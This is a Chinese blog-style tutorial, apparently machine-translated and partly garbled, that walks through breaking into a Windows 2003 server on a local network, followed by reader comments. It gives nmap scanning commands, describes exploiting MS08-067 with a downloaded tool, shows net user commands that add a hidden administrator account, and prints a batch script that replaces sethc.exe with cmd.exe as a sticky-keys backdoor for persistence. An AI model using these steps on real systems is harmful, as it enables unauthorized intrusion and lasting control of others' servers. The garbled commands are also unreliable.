小百科带你走进黑客世界，5种完整系统攻击之一

大家好，关于小百科带你走进黑客世界，5种完整系统攻击之一很多朋友都还不太明白，今天小编就来为大家分享关于的知识，希望对各位有所帮助！

踩点——定位——入侵——留后门——抹去痕迹

在本文中，小白将向您演示如何闯入Windows 2003服务器。攻击过程也将遵循上述行为模型。

假设小白的局域网中有一台Windows 2003服务器（ip：192.168.31.0/24）。小白想去服务器走一走，但是很尴尬的是小白不认识这个服务器。 IP 地址，并且该服务器没有帐户。

看看景点

第一步：使用nmap扫描局域网，扫描局域网内的计算机及相应的操作系统。

Nmap命令：

nmap sn 网段- 使用ping 扫描局域网内的主机

nmap O ip地址 识别单个ip地址的操作系统

通过扫描主机存活情况，可以看到局域网中有5个IP地址。

192.168.31.1192.168.31.2192.168.31.133192.168.31.254192.168.31.132 通过简单判断，这三个地址192.168.31.1、192.168.31.2、192.168.31.132都属于小白’的计算机和网关。地址，直接排除即可。只剩下两个地址：192.168.31.133 和192.168.31.254。接下来我们将分别系统地识别这两个IP地址。

通过192.168.31.254的系统识别，说明这台电脑可能使用了特殊的操作系统，无法识别。也有可能该IP 地址不是计算机。接下来对192.168.31.133进行系统识别

果然找到了服务器的IP地址，nmap结果显示192.168.31.133这台电脑使用的是Windows 2003操作系统。现在我们知道了IP地址，我们就可以进行漏洞扫描了。

第二步：使用nessus扫描系统漏洞

我在上一篇文章中可能忘记提到的一件事是如何打开nessus。我在这里解释一下。如果您的本地计算机上安装了nessus，请在Firefox 或Google Chrome 中输入地址：

如果https://localhost:8834安装在另一台计算机上，则在地址栏中输入：

https://ip地址：8834 那么，现在我们使用nessus对服务器192.168.31.133开始漏洞扫描。具体使用方法请查看小白之前的文章。

分析

从上图中的扫描结果可以看出，该服务器存在一个经典的缓冲区溢出漏洞，漏洞编号为MS08-067。我们可以利用这个漏洞在服务器上执行代码。

万能的度娘告诉我这个漏洞有直接利用工具，于是小白就默默收藏了一个。

入侵

步骤1：下载ms08-067漏洞利用工具

第二步：打开cmd窗口，用鼠标将漏洞利用程序拖入窗口中

第三步：输入服务器IP地址192.168.31.133，回车进行攻击。

这里小白猜测，既然是溢出漏洞，那么肯定和内存地址有关。有可能win7的内存地址和windows2003的不一样。

小白又找到了一台Windows XP电脑进行攻击。

第四步：通过远程连接服务器的4444端口（192.168.31.133）登录服务器。

远程登录192.168.31.133 4444

当然，仅仅登录其命令行界面怎么办呢？接下来，小白要做的就是使用命令创建管理员帐户，并使用帐户密码公开登录。

第五步：创建管理员帐号和密码，并登录服务器

我们通过登录服务器的命令行界面来创建管理员帐户和密码。

命令：

net 用户用户名密码/addnet 本地组管理员用户名/add

这样我们就创建了一个管理员帐户。我们尝试通过远程桌面登录。

在本地电脑的运行窗口中输入：mstsc，打开远程桌面连接窗口，输入服务器的地址

留后门

既然服务已经被入侵了，我们怎么能不给自己留一个后门，方便下次进入呢？如果我们这次创建的账户被管理员删除了怎么办？接下来，小白在服务器上留下了一个简单的shift后门。

第一步：编写shift后门脚本

点击开始-运行，输入命令：notepad，回车，会弹出一个记事本。

在记事本中写入以下代码：

echo 权限提升开始.copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.execopy c:\windows\system32\dllcache\sethc.exe c:\windows\system32\sethc。 Exeecho提权结束.保存，文件类型选择所有文件，文件名为shift.bat

第二步：双击刚才保存的bat脚本，创建shift后门。操作完成后，尝试在服务器上连续按五次shift键。

发现服务器弹出了命令行界面，仍然具有可移植系统权限。接下来，我们关闭远程桌面并重新连接。然后不要输入账户密码，再次按shift键五次。

接下来，尝试在这个非登录的命令行界面中创建另一个管理员帐户。

我们使用dahuadan账号登录，发现登录成功。

这样一来，即使管理员删除了我们偷偷创建的账户，我们也不用担心~再创建一个就好了~

抹去痕迹

还没有参与（需要同学们自行研究）

用户评论

有些人,只适合好奇~

终于有了能看懂的讲解！以前看过一些黑客教程，都是一大堆代码，弄得我一头雾水，这篇讲得非常清楚，把整个攻击流程一步步解释下来，我现在对一次完整的系统攻击行为有了初步的了解。希望以后还有更多这样详细易懂的文章！

    有7位网友表示赞同！

怀念·最初

看了这篇文章后真的感受深厚，原来黑客攻击这么复杂啊，需要这么多步骤和技巧才能成功。 感觉自己之前的理解还是太浅了，真是太危险了，我们要更加重视安全防护措施！

    有12位网友表示赞同！

你tm的滚

作者分析的非常细致，特别是对每个阶段使用的工具和技术都有详细的描述，帮助我更好地理解黑客攻击的运作机制。期待后续文章继续深入浅出地讲解其他的黑客行为模式。

    有20位网友表示赞同！

惦着脚尖摘太阳

说得太深了，我是小白玩家，感觉有点超出我的能力范围了。 希望能有更简单的入门教程来解释一些基础的概念。

    有6位网友表示赞同！

自繩自縛

这个案例很有意思，演示过程很清晰。让我对黑客攻击的完整流程有了更深入的理解！希望以后能看到更多实战案例，可以更直观地学习到黑客世界的知识

    有19位网友表示赞同！

呆萌

感觉文章写的有点过于理论化，实用性不够强。 我更希望能看到一些实战视频或者代码案例，这样更容易理解和记忆。

    有11位网友表示赞同！

淡抹丶悲伤

小白玩家看的有些费劲啊，建议增加一些生动的图片或图表来辅助理解，毕竟看一堆文字还是容易让人疲乏。

    有20位网友表示赞同！

素衣青丝

文章分析很有深度，作者对黑客技术的了解很透彻。 学习了黑客攻防的思路，能够更好地提高自己的安全意识和防护能力。

    有19位网友表示赞同！

伱德柔情是我的痛。

这篇文章非常有启发性! 对理解黑客行为过程有了更清晰的认识。 我在学习网络安全技术的道路上迈出了重要一步！

    有11位网友表示赞同！

生命一旅程

有点想问一下，这些攻击方法都是针对什么类型的系统呢？ 能给我一点具体的例子吗？

    有7位网友表示赞同！

别悲哀

我很担心我的电脑会不会被黑客攻击。看了这篇文章后感觉越不安了。我应该怎么做才能更好地保护自己？ 欢迎更多人来分享安全防护的知识! 希望小白玩家都能学习到一些实用的知识，避免受骗取损失。

    有13位网友表示赞同！

墨染年华

这个文章很有用哦，让我对黑客攻击有了更深入的了解！

    有8位网友表示赞同！

发呆

我觉得文章中缺少一些具体的防范措施介绍。 如果能结合一些可行的防御方法，将会更加实用。

    有8位网友表示赞同！

君临臣

每次看到这些黑客攻击案例，都会忍不住感叹科技发展带来的便利与危险并存啊…

    有6位网友表示赞同！

陌颜

希望以后可以多关注一些网络安全的知识，增强自己的安全意识，保护好自己和家人!

    有6位网友表示赞同！

陌離

期待作者能分享更多黑客世界的有趣故事！

    有10位网友表示赞同！

入骨相思

文章内容丰富，逻辑清晰，很有可读性。 是个很好的入门资源！

    有12位网友表示赞同！